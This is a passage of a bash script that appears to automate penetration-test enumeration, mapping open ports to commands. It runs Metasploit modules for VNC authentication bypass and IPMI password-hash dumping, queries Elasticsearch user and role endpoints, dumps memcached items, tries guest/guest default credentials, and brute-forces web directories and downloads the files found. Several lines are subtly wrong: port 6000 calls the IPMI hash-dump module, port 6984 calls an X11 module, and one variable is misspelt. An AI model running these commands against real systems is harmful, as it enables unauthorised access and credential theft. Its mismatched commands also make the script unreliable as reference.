            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc
            nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS $target; set RPORT 5800; run; exit"
            ;;
        5801)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc
            nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS $target; set RPORT 5801; run; exit"
            ;;
        5900)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc
            nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS $target; set RPORT 5900; run; exit"
            ;;
        5901)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc
            nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS $target; set RPORT 5901; run; exit"
            ;;
        5984)
            # https://book.hacktricks.xyz/network-services-pentesting/5984-pentesting-couchdb
            nmap -sV --script couchdb-databases,couchdb-stats -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOSTS $target; set RPORT 5984; run; exit"
            ;;
        5985)
            # https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm
            curl -I http://"$target":"$port"
            ;;
        5986)
            # https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm
            curl -I http://"$target":"$port"
            ;;
        6000)
            nmap -sV --script x11-access -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS $target; set RPORT $port; run; exit"
            ;;
        6379)
            # https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
            nmap --script redis-info -sV -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/redis/redis_server; set RHOSTS $target; set RPORT $port; run; exit"
            ;;
        6984)
            # https://book.hacktricks.xyz/network-services-pentesting/5984-pentesting-couchdb
            nmap -sV --script couchdb-databases,couchdb-stats -p "$port" "$target"
            msfconsole -q -x "use auxiliary/scanner/x11/open_x11; set RHOSTS $target; set RPORT $port; run; exit"
            ;;
        8009)
            # https://book.hacktricks.xyz/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp
            nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p "$port" "$target"
            ;;
        8080)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-web
            whatweb "http://$target:$port"
            echo
            curl -Iks "http://$target:$port" 2>/dev/null
            wafw00f "http://$target:$port" 2>/dev/null
            if [ "$using_web" == true ]; then
            	mkdir -p "$enumx_dir"/web 2>/dev/null
            	echo
            	echo 'Enumerating web directories for available files...'
            	feroxbuster -u http://"$target" -s 200 -t100 -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt --silent --no-state > "$enumx_dir/urls"
            	cat "$enumx_dir/urls" | sort -u | sed '1d' | sed '1d' | tee "$enumx_dir/urls"
            	while IFS= read -r url; do
            		curl -o "$enumx_dir/web/$(basename "$url")" "$url" 2>/dev/null
            	done < "$enumx_dir/urls"
            	echo
            	echo -e "Authors / Creators of files found:"
            	exiftool "$enumx_dir"/web/* | grep -v 'Tool' | grep -E 'Author|Creator' | sed -E 's/.*:\s*(.*)/\1/' | sort -u 2>/dev/null
           	fi
            ;;
        8086)
            # https://book.hacktricks.xyz/network-services-pentesting/8086-pentesting-influxdb
            influx -host "$target" -port "$port"
            ;;
        9100)
            # https://book.hacktricks.xyz/network-services-pentesting/9100-pjl
            nc -vn "$target" "$port"
            ;;
        9200)
            # https://book.hacktricks.xyz/network-services-pentesting/9200-pentesting-elasticsearch
            curl -X GET "http://$target:$port/"
            curl -X GET "http://$target:$port/_security/role"
            curl -X GET "http://$target:$port/_security/user"
            curl -X GET "http://$target:$port/_security/user/admin"
            ;;
        10000)
            # https://book.hacktricks.xyz/network-services-pentesting/10000-network-data-management-protocol-ndmp
            nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p "$port" "$target"
            ;;
        11211)
            echo "version" | nc -vn -w 1 "$target" "$port"
            echo "stats" | nc -vn -w 1 "$target" "$port"
            echo "stats slabs" | nc -vn -w 1 "$target" "$port"
            echo "stats items" | nc -vn -w 1 "$target" "$port"
            echo "stats cachedump <number> 0" | nc -vn -w 1 "$target" "$port"
            echo "get <item_name>" | nc -vn -w 1 "$target" "$port"
            nmap -n -sV --script memcached-info -p "$port" "$target"
            ;;
        15672)
            legba stomp --target "$target":"$port" --username guest --password guest
            ;;
        27017)
            # https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb
            nmap -sV --script "mongo* and default" -p "$port" "$target"
            ;;
        27018)
            # https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb
            nmap -sV --script "mongo* and default" -p "$port" "$targt"
            ;;
        44818)
            # https://book.hacktricks.xyz/network-services-pentesting/44818-ethernetip
            nmap -n -sV --script enip-info -p "$port" "$target"
            ;;
        47808)
            # https://book.hacktricks.xyz/network-services-pentesting/47808-udp-bacnet
            nmap --script bacnet-info --script-args full=yes -sU -n -sV -p "$port" "$target"
            ;;
        *)
            nmap $target -p"$port" --host-timeout 2s -T5 | grep -vE 'Nmap|latency|nmap' | sed '1d'
            ;;
    esac
done
